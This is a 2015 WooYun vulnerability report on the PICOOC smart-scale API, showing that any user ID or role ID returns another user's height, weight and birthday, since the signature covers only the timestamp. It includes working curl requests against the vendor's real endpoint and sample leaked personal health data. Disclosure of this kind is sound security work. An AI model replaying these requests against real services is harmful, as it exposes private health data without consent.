有品（PICOOC）智能秤客户端接口设计缺陷可导致用户信息泄漏

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095319

漏洞标题：有品（PICOOC）智能秤客户端接口设计缺陷可导致用户信息泄漏

漏洞作者： duxins

提交时间：2015-02-03 09:18

修复时间：2015-03-20 09:20

公开时间：2015-03-20 09:20

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-02-03：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-03-20：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

影响所有注册用户

详细说明：

传入 UserID/RoleID 即可查看任意用户的身高体重出生日期等信息
签名计算方式也有问题，只对 timestamp 做了签名验证

curl -d reqData='%7B%22method%22%3A%22getRoles%22%2C%22appver%22%3A%225.5%22%2C%22req%22%3A%7B%22userID%22%3A8886%7D%2C%22sign%22%3A%22B8C79E56FAD3A6BAED894F8EAC6C2B42%22%2C%22timestamp%22%3A%221422111111%22%7D' http://www.picooc.com/picooc/interface/
curl -d reqData='%7B%22method%22%3A%22getRoles%22%2C%22appver%22%3A%225.5%22%2C%22req%22%3A%7B%22userID%22%3A9999%7D%2C%22sign%22%3A%22B8C79E56FAD3A6BAED894F8EAC6C2B42%22%2C%22timestamp%22%3A%221422111111%22%7D' http://www.picooc.com/picooc/interface/
curl -d reqData=%7B%22method%22%3A%22getLatestBodyIndex%22%2C%22appver%22%3A%225.5%22%2C%22req%22%3A%7B%22roleId%22%3A18306%7D%2C%22sign%22%3A%22DF7E58BD54A17625D53221CD519E837E%22%2C%22timestamp%22%3A%221422859378%22%7D http://www.picooc.com/picooc/interface/

返回结果：

{"method":"getRoles","result":{"code":"0","message":"\u83b7\u53d6\u89d2\u8272\u4fe1\u606f\u6210\u529f\uff01"},"resp":{"roles":[{"roleID":"16454","name":"****","height":"1.68","sex":"1","birthday":"1974-10-13","server_time":"1392443421","user_id":"8888","head_protail_url":"","gole_weight":"65.0","picooc_index_accumulate":"0","goal_fat":"20.6","time":"1392443776","first_weight":"67.0","first_fat":"22.5","first_use_time":"1392443613","change_goal_weight_time":"1392443776","weight_change_target":"-1.2","is_remote":0,"alias_name":"","email":"","phoneNumber":"","role_infos":[{"height":"1.68","sex":"1","birthday":"1974-10-13","goal_weight":"65.2","goal_fat":"20.2","time":"1392443414","change_goal_weight_time":"1392443674","role_id":"16454","weight_change_target":"-1.2"},{"height":"1.68","sex":"1","birthday":"1974-10-13","goal_weight":"65.2","goal_fat":"20.2","time":"1392443414","change_goal_weight_time":"1392443674","role_id":"16454","weight_change_target":"-1.2"},{"height":"1.68","sex":"1","birthday":"1974-10-13","goal_weight":"65.0","goal_fat":"20.6","time":"1392443414","change_goal_weight_time":"1392443776","role_id":"16454","weight_change_target":"-1.2"}]}],"myUserId":8888}}
{"method":"getLatestBodyIndex","result":{"code":"0","message":"\u83b7\u53d6\u89d2\u8272\u6d4b\u91cf\u6570\u636e\u6210\u529f"},"resp":{"amount":1,"bodyIndexs":[{"1":18308,"2":"81.2","3":"23.4","4":"27.1","5":"9","6":"72.8","7":"56.7","8":"31","9":"3.1","10":"1713","11":1422570216,"12":1422570215,"13":"0.0","14":"5247831"}]}}

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095319

漏洞标题：有品（PICOOC）智能秤客户端接口设计缺陷可导致用户信息泄漏

相关厂商：有品

漏洞作者： duxins

提交时间：2015-02-03 09:18

修复时间：2015-03-20 09:20

公开时间：2015-03-20 09:20

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 duxins@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-095319

漏洞标题：有品（PICOOC）智能秤客户端接口设计缺陷可导致用户信息泄漏

相关厂商：有品

漏洞作者： duxins

提交时间：2015-02-03 09:18

修复时间：2015-03-20 09:20

公开时间：2015-03-20 09:20

漏洞类型：敏感信息泄露

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-095319"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 duxins@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：